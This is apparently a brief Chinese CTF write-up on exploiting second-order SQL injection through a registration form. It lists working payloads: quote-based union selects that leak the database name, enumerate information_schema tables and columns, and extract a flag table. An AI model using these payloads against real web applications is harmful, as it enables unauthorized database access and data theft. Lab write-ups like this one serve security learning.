二次注入
不是命令执行,目录扫描也没有,源码没有
在注册后可以登录
登录后只有 Info 下方有字符变化
考虑注入,发现输入 ’ 号时前面会多回显出一个 \
' order by 4 #
但输入的字符仍然当作普通字符回显,没有进行执行
一个回显点
前有空格不能注册,加一个 ‘
' union select database()#
回显成功
' union select table_name from information_schema.tables where table_schema=database()#
' union select column_name from information_schema.columns where table_schema=database()#
'union select flag from flag#